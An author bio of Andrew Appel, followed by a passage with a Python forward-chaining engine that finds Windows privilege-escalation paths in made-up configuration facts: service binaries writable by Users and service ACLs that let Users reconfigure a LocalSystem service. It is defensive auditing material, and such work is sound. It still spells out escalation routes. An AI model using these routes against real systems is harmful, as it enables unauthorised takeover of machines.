Andrew Appel is a Professor of Computer Science at Princeton University. He is currently on sabbatical at INRIA Rocquencourt. His interests are computer security, compilers, programming languages, type theory, and functional programming.
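The approach described above separates the facts a scanner extracts (who is in which group, who may write which file, which binary a service starts and as which account, who may reconfigure a service) from the rules that combine them into an escalation path. The Python below is an added example, not the authors' Datalog model and not scanner output: a small forward-chaining engine over constructed facts of those kinds, with rules that derive which non-administrative principals can come to control a service running as LocalSystem. All user names, groups, paths, service names and ACL entries are made up for the illustration.

```python
from typing import Dict, Set, Tuple

# Constructed configuration facts (nothing here is real scanner output).
#   member(principal, group)               principal is in group; groups may nest
#   file_acl(path, principal, right)       ACL entry on a file
#   service_binary(service, path)          image the service starts
#   service_account(service, account)      account the service runs as
#   service_acl(service, principal, right) ACL entry on the service object itself
FACTS: Dict[str, Set[Tuple[str, ...]]] = {
    "member": {("alice", "Users"), ("carol", "Helpdesk"), ("Helpdesk", "Users"),
               ("bob", "Administrators")},
    "file_acl": {
        (r"C:\Program Files\ExampleApp\svc.exe", "Users", "write"),   # the misconfiguration
        (r"C:\Program Files\Other\other.exe", "Administrators", "write"),
        (r"C:\Windows\System32\svchost.exe", "Administrators", "write"),
    },
    "service_binary": {
        ("ExampleSvc", r"C:\Program Files\ExampleApp\svc.exe"),
        ("OtherSvc", r"C:\Program Files\Other\other.exe"),
        ("Dhcp", r"C:\Windows\System32\svchost.exe"),
    },
    "service_account": {("ExampleSvc", "LocalSystem"), ("OtherSvc", "LocalSystem"),
                        ("Dhcp", "LocalSystem")},
    "service_acl": {("OtherSvc", "Users", "change_config"),           # the other misconfiguration
                    ("Dhcp", "Administrators", "change_config")},
}


def derive(facts):
    """Forward-chain the rules below until no new tuple appears (a hand-rolled
    stand-in for a Datalog engine)."""
    d = {k: set(v) for k, v in facts.items()}
    for rel in ("can_write", "controls_service", "runs_as"):
        d.setdefault(rel, set())

    def add(rel, tup):
        if tup in d[rel]:
            return False
        d[rel].add(tup)
        return True

    changed = True
    while changed:
        changed = False
        # member(P,G) :- member(P,H), member(H,G).            nested groups
        for (p, h) in list(d["member"]):
            for (h2, g) in list(d["member"]):
                if h == h2:
                    changed |= add("member", (p, g))
        # can_write(P,F) :- file_acl(F,G,write), member(P,G).
        for (f, g, right) in d["file_acl"]:
            if right == "write":
                for (p, g2) in d["member"]:
                    if g2 == g:
                        changed |= add("can_write", (p, f))
        # controls_service(P,S) :- service_binary(S,B), can_write(P,B).
        for (s, b) in d["service_binary"]:
            for (p, f) in list(d["can_write"]):
                if f == b:
                    changed |= add("controls_service", (p, s))
        # controls_service(P,S) :- service_acl(S,G,change_config), member(P,G).
        for (s, g, right) in d["service_acl"]:
            if right == "change_config":
                for (p, g2) in d["member"]:
                    if g2 == g:
                        changed |= add("controls_service", (p, s))
        # runs_as(P,A) :- controls_service(P,S), service_account(S,A).
        for (p, s) in list(d["controls_service"]):
            for (s2, a) in d["service_account"]:
                if s == s2:
                    changed |= add("runs_as", (p, a))
    return d


def find_escalations(facts, high_privilege=("LocalSystem",), admin_group="Administrators"):
    """Report (principal, service, account) for every principal that is neither
    a group nor already an administrator but can control a high-privilege service."""
    d = derive(facts)
    groups = {g for (_, g) in d["member"]}
    admins = {p for (p, g) in d["member"] if g == admin_group}
    found = set()
    for (p, s) in d["controls_service"]:
        if p in groups or p in admins:
            continue
        for (s2, a) in d["service_account"]:
            if s2 == s and a in high_privilege:
                found.add((p, s, a))
    return sorted(found)


if __name__ == "__main__":
    for finding in find_escalations(FACTS):
        print("escalation:", finding)
```

Two independent misconfigurations surface: a service binary writable by Users, and a service object whose ACL lets Users change its configuration; the nested-group rule is what catches carol, who is never listed in Users directly. Removing those two ACL entries makes the engine report nothing, which is the check a developer would run after fixing an installer.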